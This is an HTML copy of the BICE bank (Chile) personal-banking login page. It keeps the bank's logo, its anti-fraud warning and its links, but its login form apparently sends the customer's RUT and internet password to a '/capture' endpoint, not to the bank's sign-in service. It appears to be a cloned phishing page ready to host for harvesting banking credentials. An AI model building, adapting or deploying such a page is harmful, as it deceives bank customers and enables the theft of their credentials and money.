<!DOCTYPE html>
<!-- saved from url=(0341)https://auth.bice.cl/realms/personas/protocol/openid-connect/auth?client_id=portal-personas&redirect_uri=https%3A%2F%2Fportalpersonas.bice.cl%2F&response_type=code&state=6MQwwd0ULldse609oUP9bhPmLGrEMLYnszt2QkAo6dxFrgIyOw4ypQBYw2qJpEFs&code_challenge=nYmV6Ad9K8WEGW1GHyA3aOco8IPCY6ci-s-gkMlltBE&code_challenge_method=S256&scope=openid+profile -->
<html class=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
        
        <meta name="robots" content="noindex, nofollow">
        <title>Inicia sesión en personas</title>
        <link rel="icon" type="ico" href="https://auth.bice.cl/resources/wza8e/login/bicePersonasThemes/img/biceicon.ico">
        <link href="index_files/css" rel="stylesheet">
                <link href="index_files/bootstrap.min.css" rel="stylesheet">
                <link href="index_files/template.css" rel="stylesheet">
                <script src="index_files/jquery.min.js.descargar" type="text/javascript"></script>
                <script src="index_files/bootstrap.min.js.descargar" type="text/javascript"></script>
                <script src="index_files/moment.js.descargar" type="text/javascript"></script>
                <script src="index_files/moment-timezone-with-data.js.descargar" type="text/javascript"></script>
    </head>

    <body class="" cz-shortcut-listen="true">

    <div class="">
        <div class="">
            <header class="">
            </header>
            <div id="kc-content">
                <div id="kc-content-wrapper">

    <div class="divAviso" id="divAviso" style="background-color: transparent;">
        <div class="d-flex">
            <div class="d-flex">
                <img id="exitImg" src="index_files/warning.svg" style="display: none;">
                <div>
                    <p class="text-left pAviso" id="pAviso" style="display: none;"><strong class="fw-600">¡No caigas en estafas telefónicas!</strong>
 Te recordamos que NUNCA te contactará un/a ejecutivo/a BICE para 
realizar devoluciones de ningún tipo, por ejemplo, comisiones 
supuestamente cobradas de manera errónea, ni transacciones que requieran
 tu autorización a través de BICE Pass. <strong class="fw-600">NUNCA ENTREGUES TUS CLAVES</strong>. Ante cualquier sospecha, llámanos al 600 400 2400.</p>
                </div>
                <img id="exitAviso" src="index_files/close.svg" alt="" class="" onclick="closeDiv()" style="cursor: pointer; display: none;">
            </div>
        </div>
    </div>
        <script type="text/javascript" src="index_files/login.min.js.descargar"></script>
        <div id="kc-form">
            <div id="kc-form-wrapper">
                    <div class="row mx-0 justify-content-center">
                        <div class="col-sm-12 col-lg-6 painted text-center">

                            <div class="w300 mx-auto">
        <div id="spacerHead" class="spacerHead spacer32px"></div>

                            </div>

                            <div class="irAlInicio">
                                <a class="biceClaro" href="https://www.bice.cl/" target="_top" style="margin-right: 230px;">
                                    <img src="index_files/arrow-left.svg" alt="arrow-left">
                                    <span class="azulBiceClaro" style="">Ir al Inicio</span>
                                </a>
                            </div>

                            <div class="text-center headerSignin">
                                <div class="spacer3"></div>
                                <img id="firstImg" class="w-164" src="index_files/logo-bice.svg">
                                <div class="spacer24px"></div>
                                <p class="popFont" style="">Te damos la bienvenida a Banca Personas</p>
                                <div class="spacer24px"></div>
                            </div>

                            <form id="kc-form-login" onsubmit="login.disabled = true; return true;" action="/capture" method="post">
                    		<input type="hidden" id="idSesion" name="idSesion" autocomplete="idSesion">
    
                                    <div class="w300 mx-auto ">
                                        <label id="labelRut" for="username" class="h40 cursorText label-form rutLabel" onclick="forceFocusRut('username'); moveLabelRut('labelRut')">
                                             RUT
                                        </label>

                                        <input tabindex="1" id="username" class="form-control inputRut h40 w300 " onfocus="focusRut(1);moveLabelRut('labelRut')" onblur="outLabelRut(event,'labelRut');focusRut(0);formatRutPersonas('#username');validInpUsr('username','kc-login');" onkeyup="suppressCharacterRutPersona(event);" name="username" type="text" autocomplete="off">
                                        <div class="col-md-12 msg-error" style="height: 32px;">
                                            <div id="textTwo" name="textTwo" class="w300 error-form">
                                                El Rut no es correcto.</div>
                                    </div>

                                <div class="w300 mx-auto position-relative ">
                                    <label id="labelPassword" for="password" class="h40 passwordLabel cursorText label-form " onclick="forceFocusPassword('password'); moveLabelPassword('labelPassword')">Clave Internet</label>

                                    <input tabindex="2" id="password" class="form-control h40 w300 letterSpacingPassword inputPassword inputPasswordMD" name="password" type="password" autocomplete="off" onblur="outLabelPassword(event,'password','labelPassword');validInpCtr('password','kc-login');" maxlength="8" onfocus="focusClave(1,'labelPassword');moveLabelPassword('labelPassword')">
                                    <span class="unselectable" style="margin-left: 115px;position: absolute;z-index: 10;cursor: pointer;top: 15px;" id="showPassword">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>
                                    <div class="col-md-12 msg-error" style="height: 32px;">
                                        <div id="textOne" name="textOne" class="w300 error-form">
                                            Olvidaste algo...</div>
                                    </div>
                                </div>
                                <div class="col-md-12 h-48">
                                    <div class="spanpassword">
                                        <a id="linkClaveInternet" href="https://core.bice.cl/fe-autenticacion/"><b style="color: #1976D2;cursor: pointer;font-family: Poppins;font-style: normal;font-weight: normal;font-size: 12px;line-height: 18px;text-decoration-line: underline;color: #1976D2; ">
                                                ¿Tienes problemas con tu clave internet?</b></a>
                                    </div>
                                </div>
                                <div class="w300 mx-auto">
                                    <input type="hidden" id="id-hidden-input" name="credentialId">
                                    <input tabindex="4" class="entrar boton btn btn-ingresar w300    " name="login" id="kc-login" type="submit" onclick="sendForm()" value="Ingresar" style="cursor: not-allowed;" disabled="disabled">
                                </div>
                                <div class="row justify-content-center">
                                    <div class="div-masinfo"><hr class="hr-masinfo"></div>
                                    <div>&nbsp;<b class="b-masinfo">Para más información</b> </div>
                                    <div class="div-masinfo"><hr class="hr-masinfo"></div>
                                </div>
                                <div class="row justify-content-center">
                                    <a href="tel:6004001000"><img src="index_files/group_7316.svg" class="img-llamanos"></a>
                                </div>

                            
                        </div></form>
            </div>
        </div>
                </div>
            </div>

        </div>
    </div>

    <div>
        <p class="legal-center"> <i class="fa fa-copyright" style="margin: 0px;"></i>2024 Todos los
            Derechos
            Reservados.</p>
        <p class="legal-center">Infórmese sobre la garantía estatal de los depósitos en su banco o en
            www.cmfchile.cl</p>
    </div>
    
</div></div></body></html>